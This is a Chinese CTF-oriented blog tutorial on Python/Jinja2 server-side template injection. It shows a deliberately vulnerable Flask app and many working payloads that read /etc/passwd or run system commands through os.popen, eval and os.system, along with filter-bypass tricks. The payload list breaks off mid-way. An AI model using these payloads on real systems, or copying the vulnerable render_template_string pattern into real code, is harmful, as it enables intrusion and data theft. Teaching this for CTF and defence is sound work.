<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"l-1-q.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"hide","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="漏洞成因ssti模版注入和sql注入其实没有什么本质的区别,都是对用户的输入没有严格控制导致执行了某些代码造成了危害.python中常见的框架jinja2、mako、tornado、django.PHP中smerty、twig.java中的jada、velocity等. 模版引擎通俗点理解就是拿到数据，塞到模板里，然后让渲染引擎将赛进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数">
<meta property="og:type" content="article">
<meta property="og:title" content="python-ssti分析">
<meta property="og:url" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="L-1-q&#39;s blog">
<meta property="og:description" content="漏洞成因ssti模版注入和sql注入其实没有什么本质的区别,都是对用户的输入没有严格控制导致执行了某些代码造成了危害.python中常见的框架jinja2、mako、tornado、django.PHP中smerty、twig.java中的jada、velocity等. 模版引擎通俗点理解就是拿到数据，塞到模板里，然后让渲染引擎将赛进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/1.png">
<meta property="og:image" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/2.png">
<meta property="og:image" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/3.png">
<meta property="og:image" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/4.png">
<meta property="article:published_time" content="2021-12-13T10:41:24.000Z">
<meta property="article:modified_time" content="2021-12-15T03:34:55.014Z">
<meta property="article:author" content="L-1-q">
<meta property="article:tag" content="ssti">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/1.png">

<link rel="canonical" href="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>python-ssti分析 | L-1-q's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">L-1-q's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://l-1-q.top/2021/12/13/python-ssti%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="L-1-q">
      <meta itemprop="description" content="勤奋和耐心是最朴实的道理,我们会在腐朽的日子里光芒万丈!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="L-1-q's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          python-ssti分析
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-12-13 18:41:24" itemprop="dateCreated datePublished" datetime="2021-12-13T18:41:24+08:00">2021-12-13</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-12-15 11:34:55" itemprop="dateModified" datetime="2021-12-15T11:34:55+08:00">2021-12-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf%E7%9F%A5%E8%AF%86/" itemprop="url" rel="index"><span itemprop="name">ctf知识</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>ssti模版注入和sql注入其实没有什么本质的区别,都是对用户的输入没有严格控制导致执行了某些代码造成了危害.python中常见的框架jinja2、mako、tornado、django.PHP中smerty、twig.java中的jada、velocity等.</p>
<h2 id="模版引擎"><a href="#模版引擎" class="headerlink" title="模版引擎"></a>模版引擎</h2><p>通俗点理解就是拿到数据，塞到模板里，然后让渲染引擎将赛进去的东西生成 html 的文本，返回给浏览器，这样做的好处展示数据快，大大提升效率。</p>
<p>以python为例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">from flask import Flask</span><br><span class="line">from flask import render_template</span><br><span class="line">from flask import request</span><br><span class="line">from flask import render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">@app.route(&#x27;/test&#x27;,methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span><br><span class="line"></span><br><span class="line">def test():</span><br><span class="line">    name = request.args.get(&quot;name&quot;)</span><br><span class="line">    template = &#x27;&#x27;&#x27;</span><br><span class="line">        &lt;div class=&quot;center-content error&quot;&gt;</span><br><span class="line">            &lt;h1&gt;Hello, %s&lt;/h1&gt;</span><br><span class="line">        &lt;/div&gt; </span><br><span class="line">    &#x27;&#x27;&#x27; %(name)</span><br><span class="line">    return render_template_string(template)</span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.debug = True</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>访问的页面为<br><img src="/2021/12/13/python-ssti%E5%88%86%E6%9E%90/1.png"><br>inja2是Flask作者开发的一个模板系统，起初是仿django模板的一个模板引擎，为Flask提供模板支持，由于其灵活，快速和安全等优点被广泛使用。</p>
<p>在jinja2中，存在三种语：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">控制结构 &#123;% %&#125;</span><br><span class="line">变量取值 &#123;&#123; &#125;&#125;</span><br><span class="line">注释 &#123;# #&#125;</span><br></pre></td></tr></table></figure>
<p>jinja2模板中使用 <code>&#123;&#123; &#125;&#125;</code>语法表示一个变量，它是一种特殊的占位符。当利用jinja2进行渲染的时候，它会把这些特殊的占位符进行填充/替换，jinja2支持python中所有的Python数据类型比如列表、字段、对象等<br>inja2中的过滤器可以理解为是jinja2里面的内置函数和字符串处理函数。<br>被两个括号包裹的内容会输出其表达式的值</p>
<h2 id="python的ssti"><a href="#python的ssti" class="headerlink" title="python的ssti"></a>python的ssti</h2><p>当发现某个地方有ssti的时候，一般有两种思路</p>
<ul>
<li>读取配置文件</li>
<li>执行系统命令</li>
</ul>
<h3 id="读取配置"><a href="#读取配置" class="headerlink" title="读取配置"></a>读取配置</h3><p>pythonweb框架，比如说flask，在框架中内置了一些全局变量，对象，函数等等。我们可以直接访问或是调用。有的ctf会把flag放进config中，或者将敏感信息放到全局配置中，比如我们可以通过<code>&#123;&#123;config&#125;&#125;</code>读取配置文件<br><img src="/2021/12/13/python-ssti%E5%88%86%E6%9E%90/2.png"></p>
<h3 id="执行命令"><a href="#执行命令" class="headerlink" title="执行命令"></a>执行命令</h3><p>Flask SSTI 题的基本思路就是利用 python 中的 魔术方法 找到自己要用的函数。</p>
<ul>
<li>__dict__：保存类实例或对象实例的属性变量键值对字典</li>
<li>__class__：返回调用的参数类型</li>
<li>__mro__：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。</li>
<li>__bases__：返回类型列表</li>
<li>__subclasses__：返回object的子类</li>
<li>__init__：类的初始化方法</li>
<li>__globals__：函数会以字典类型返回当前位置的全部全局变量 与 func_globals 等价</li>
</ul>
<blockquote>
<p>base 和 mro 都是用来寻找基类的。主要是为了寻找object类</p>
</blockquote>
<p>基本流程是：</p>
<ul>
<li>随便找一个内置类对象用__class__拿到他所对应的类</li>
<li>用__bases__拿到基类（）</li>
<li>用__subclasses__()拿到子类列表</li>
<li>在子类列表中直接寻找可以利用的类getshell。</li>
</ul>
<p>利用python2举个例子:</p>
<ol>
<li><p>找到基类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&#x27;.__class__.__mro__[-1]</span><br><span class="line">&#123;&#125;.__class__.__bases__[0]</span><br><span class="line">().__class__.__bases__[0]</span><br><span class="line">[].__class__.__bases__[0]</span><br><span class="line">request.__class__.__mro__[8] #jinjia2/flask 适用  [9]</span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt; &#x27;&#x27;.__class__.__mro__[-1]</span><br><span class="line">&lt;type &#x27;object&#x27;&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>测试的时候利用bases或者mro查看具体排序,因为会根据python版本的不同而有变化</p>
</blockquote>
</li>
<li><p>获取到基类以后,继续获取基类(object)中的子类</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">object.__subclasses__()</span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt; &#123;&#125;.__class__.__bases__[0].__subclasses__()</span><br><span class="line">[&lt;type &#x27;type&#x27;&gt;, &lt;type &#x27;weakref&#x27;&gt;, &lt;type &#x27;weakcallableproxy&#x27;&gt;, &lt;type &#x27;weakproxy&#x27;&gt;, &lt;type &#x27;int&#x27;&gt;, &lt;type &#x27;basestring&#x27;&gt;, &lt;type &#x27;bytearray&#x27;&gt;, &lt;type &#x27;list&#x27;&gt;, &lt;type &#x27;NoneType&#x27;&gt;, &lt;type &#x27;NotImplementedType&#x27;&gt;, &lt;type &#x27;traceback&#x27;&gt;, &lt;type &#x27;super&#x27;&gt;, &lt;type &#x27;xrange&#x27;&gt;, &lt;type &#x27;dict&#x27;&gt;, &lt;type &#x27;set&#x27;&gt;, &lt;type &#x27;slice&#x27;&gt;, &lt;type &#x27;staticmethod&#x27;&gt;, &lt;type &#x27;complex&#x27;&gt;, &lt;type &#x27;float&#x27;&gt;, &lt;type &#x27;buffer&#x27;&gt;, &lt;type &#x27;long&#x27;&gt;, &lt;type &#x27;frozenset&#x27;&gt;, &lt;type &#x27;property&#x27;&gt;, &lt;type &#x27;memoryview&#x27;&gt;, &lt;type &#x27;tuple&#x27;&gt;, &lt;type &#x27;enumerate&#x27;&gt;, &lt;type &#x27;reversed&#x27;&gt;, &lt;type &#x27;code&#x27;&gt;, &lt;type &#x27;frame&#x27;&gt;, &lt;type &#x27;builtin_function_or_method&#x27;&gt;, &lt;type &#x27;instancemethod&#x27;&gt;, &lt;type &#x27;function&#x27;&gt;, &lt;type &#x27;classobj&#x27;&gt;, &lt;type &#x27;dictproxy&#x27;&gt;, &lt;type &#x27;generator&#x27;&gt;, &lt;type &#x27;getset_descriptor&#x27;&gt;, &lt;type &#x27;wrapper_descriptor&#x27;&gt;, &lt;type &#x27;instance&#x27;&gt;, &lt;type &#x27;ellipsis&#x27;&gt;, &lt;type &#x27;member_descriptor&#x27;&gt;, &lt;type &#x27;file&#x27;&gt;, &lt;type &#x27;PyCapsule&#x27;&gt;, &lt;type &#x27;cell&#x27;&gt;, &lt;type &#x27;callable-iterator&#x27;&gt;, &lt;type &#x27;iterator&#x27;&gt;, &lt;type &#x27;sys.long_info&#x27;&gt;, &lt;type &#x27;sys.float_info&#x27;&gt;, &lt;type &#x27;EncodingMap&#x27;&gt;, &lt;type &#x27;fieldnameiterator&#x27;&gt;, &lt;type &#x27;formatteriterator&#x27;&gt;, &lt;type &#x27;sys.version_info&#x27;&gt;, &lt;type &#x27;sys.flags&#x27;&gt;, &lt;type &#x27;exceptions.BaseException&#x27;&gt;, &lt;type &#x27;module&#x27;&gt;, &lt;type &#x27;imp.NullImporter&#x27;&gt;, &lt;type &#x27;zipimport.zipimporter&#x27;&gt;, &lt;type &#x27;posix.stat_result&#x27;&gt;, &lt;type &#x27;posix.statvfs_result&#x27;&gt;, &lt;class &#x27;warnings.WarningMessage&#x27;&gt;, &lt;class &#x27;warnings.catch_warnings&#x27;&gt;, &lt;class &#x27;_weakrefset._IterationGuard&#x27;&gt;, &lt;class &#x27;_weakrefset.WeakSet&#x27;&gt;, &lt;class &#x27;_abcoll.Hashable&#x27;&gt;, &lt;type &#x27;classmethod&#x27;&gt;, &lt;class &#x27;_abcoll.Iterable&#x27;&gt;, &lt;class &#x27;_abcoll.Sized&#x27;&gt;, &lt;class &#x27;_abcoll.Container&#x27;&gt;, &lt;class &#x27;_abcoll.Callable&#x27;&gt;, &lt;type &#x27;dict_keys&#x27;&gt;, &lt;type &#x27;dict_items&#x27;&gt;, &lt;type &#x27;dict_values&#x27;&gt;, &lt;class &#x27;site._Printer&#x27;&gt;, &lt;class &#x27;site._Helper&#x27;&gt;, &lt;type &#x27;_sre.SRE_Pattern&#x27;&gt;, &lt;type &#x27;_sre.SRE_Match&#x27;&gt;, &lt;type &#x27;_sre.SRE_Scanner&#x27;&gt;, &lt;class &#x27;site.Quitter&#x27;&gt;, &lt;class &#x27;codecs.IncrementalEncoder&#x27;&gt;, &lt;class &#x27;codecs.IncrementalDecoder&#x27;&gt;]</span><br><span class="line"></span><br><span class="line">object.__subclasses__()[59]</span><br><span class="line"></span><br><span class="line">&gt;&gt;&gt; &#123;&#125;.__class__.__bases__[0].__subclasses__()[59]</span><br><span class="line">&lt;class &#x27;warnings.catch_warnings&#x27;&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>同样的所有的顺序需要具体问题具体分析</p>
</blockquote>
</li>
<li><p>init初始化类，然后globals全局来查找所有的方法及变量及参数。<br><code>&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__</code></p>
</li>
<li><p>查看其引用的__builtins__<br><code>&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#39;__builtins__&#39;]</code><br>〉利用builtins访问内置对象</p>
</li>
<li><p>这里会返回 dict 类型，寻找 keys 中可用函数，直接调用即可，使用 keys 中的 file 以实现读取文件的功能：<br><img src="/2021/12/13/python-ssti%E5%88%86%E6%9E%90/3.png"><br><code>&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#39;__builtins__&#39;][&#39;file&#39;](&#39;/etc/passwd&#39;).read()</code></p>
</li>
</ol>
<p>如何发掘可用的payload，比如我们要执行命令(可以通过docker构建不同版本的python来获取)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#python2/3</span><br><span class="line">num = 0</span><br><span class="line">for item in &#x27;&#x27;.__class__.__mro__[-1].__subclasses__():</span><br><span class="line">    try:</span><br><span class="line">        if &#x27;eval&#x27; in item.__init__.__globals__[&#x27;__builtins__&#x27;]:</span><br><span class="line">            print(num, item)</span><br><span class="line">        num+=1</span><br><span class="line">    except:</span><br><span class="line">        num+=1</span><br><span class="line">--&gt;</span><br><span class="line">(58, &lt;class &#x27;warnings.WarningMessage&#x27;&gt;)</span><br><span class="line">(59, &lt;class &#x27;warnings.catch_warnings&#x27;&gt;)</span><br><span class="line">(60, &lt;class &#x27;_weakrefset._IterationGuard&#x27;&gt;)</span><br><span class="line">(61, &lt;class &#x27;_weakrefset.WeakSet&#x27;&gt;)</span><br><span class="line">(71, &lt;class &#x27;site._Printer&#x27;&gt;)</span><br><span class="line">(76, &lt;class &#x27;site.Quitter&#x27;&gt;)</span><br><span class="line">(77, &lt;class &#x27;codecs.IncrementalEncoder&#x27;&gt;)</span><br><span class="line">(78, &lt;class &#x27;codecs.IncrementalDecoder&#x27;&gt;)</span><br><span class="line">--&gt;</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[58].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)</span><br></pre></td></tr></table></figure>

<h3 id="常见的payload"><a href="#常见的payload" class="headerlink" title="常见的payload"></a>常见的payload</h3><p>python2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;file&#x27;](&#x27;/etc/passwd&#x27;).read()</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[40](&quot;/etc/passwd&quot;).read()</span><br></pre></td></tr></table></figure>
<p>一个是直接利用了builtins里面的,另一个是利用了子类</p>
<p>python3<br>在python3中file类被删除了，所以可以通过执行命令读写文件。</p>
<ol>
<li>执行命令</li>
</ol>
<p>python2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"># 1 使用os下的popen</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[71].__init__.__globals__[&quot;os&quot;].popen(&#x27;whoami&#x27;).read()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 2 使用__builtins__下的eval</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[58].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)</span><br><span class="line"></span><br><span class="line"># 3 利用warnings.catch_warnings 进行命令执行</span><br><span class="line">查看warnings.catch_warnings方法的位置</span><br><span class="line">&gt;&gt;&gt; [].__class__.__base__.__subclasses__().index(warnings.catch_warnings)</span><br><span class="line">59</span><br><span class="line">查看linecatch的位置</span><br><span class="line">&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[59].__init__.__globals__.keys().index(&#x27;linecache&#x27;)</span><br><span class="line">25</span><br><span class="line">查找os模块的位置</span><br><span class="line">&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[59].__init__.__globals__[&#x27;linecache&#x27;].__dict__.keys().index(&#x27;os&#x27;)</span><br><span class="line">12</span><br><span class="line">查找system方法的位置(在这里使用os.open().read()可以实现一样的效果,步骤一样,不再复述)</span><br><span class="line">&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[59].__init__.__globals__[&#x27;linecache&#x27;].__dict__.values()[12].__dict__.keys().index(&#x27;system&#x27;)</span><br><span class="line">144</span><br><span class="line">调用system方法</span><br><span class="line">&gt;&gt;&gt; [].__class__.__base__.__subclasses__()[59].__init__.__globals__[&#x27;linecache&#x27;].__dict__.values()[12].__dict__.values()[144](&#x27;whoami&#x27;)</span><br><span class="line">root</span><br><span class="line"></span><br><span class="line"># 4 利用commands</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;commands&#x27;).getstatusoutput(&#x27;ls&#x27;)</span><br><span class="line"></span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;os&#x27;).system(&#x27;ls&#x27;)</span><br></pre></td></tr></table></figure>
<p>python3</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># 1 直接使用popen, os._wrap_close类里有popen</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__[&#x27;popen&#x27;](&#x27;whoami&#x27;).read()</span><br><span class="line"></span><br><span class="line"># 2 使用__builtins__下的eval</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)</span><br><span class="line"></span><br><span class="line"># 3 使用commands</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[80].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;os&#x27;).system(&#x27;ls&#x27;)</span><br></pre></td></tr></table></figure>

<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h3><ol>
<li>绕过中括号[]</li>
</ol>
<ul>
<li><p>getitem()</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; &quot;&quot;.__class__.__mro__[2]</span><br><span class="line">&lt;type &#x27;object&#x27;&gt;</span><br><span class="line">&gt;&gt;&gt; &quot;&quot;.__class__.__mro__.__getitem__(2)</span><br><span class="line">&lt;type &#x27;object&#x27;&gt;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>getitem迭代相关的函数</p>
</blockquote>
</li>
<li><p>pop</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__().pop(40)(&quot;/etc/passwd&quot;).read()</span><br></pre></td></tr></table></figure>
<ol start="2">
<li>过滤关键字</li>
</ol>
<ul>
<li>base64<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 编码属性__class__</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[40](&quot;/etc/passwd&quot;).read()</span><br><span class="line">--&gt;</span><br><span class="line">&#123;&#125;.__getattribute__(&#x27;X19jbGFzc19f&#x27;.decode(&#x27;base64&#x27;)).__base__.__subclasses__()[40](&quot;/etc/passwd&quot;).read()</span><br><span class="line"></span><br><span class="line"># 编码参数</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[40](&quot;L2V0Yy9wYXNzd2Q=&quot;.decode(&#x27;base64&#x27;)).read()</span><br></pre></td></tr></table></figure></li>
<li>字符串拼接绕过<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#125;.__getattribute__(&#x27;__c&#x27;+&#x27;lass__&#x27;).__base__[0].__subclasses__()[40](&quot;/etc/passwd&quot;).read()</span><br><span class="line">&#123;&#125;.__class__.__bases__[0].__subclasses__()[40](&quot;/etc&quot;+&quot;/passwd&quot;).read()</span><br></pre></td></tr></table></figure></li>
</ul>
<ol start="3">
<li>过滤引号</li>
</ol>
<ul>
<li>先获取chr函数，赋值给chr，后面拼接字符串<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% set</span><br><span class="line">chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr</span><br><span class="line">%&#125;&#123;&#123;</span><br><span class="line">().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read()</span><br><span class="line">&#125;&#125;</span><br></pre></td></tr></table></figure>
<img src="/2021/12/13/python-ssti%E5%88%86%E6%9E%90/4.png"></li>
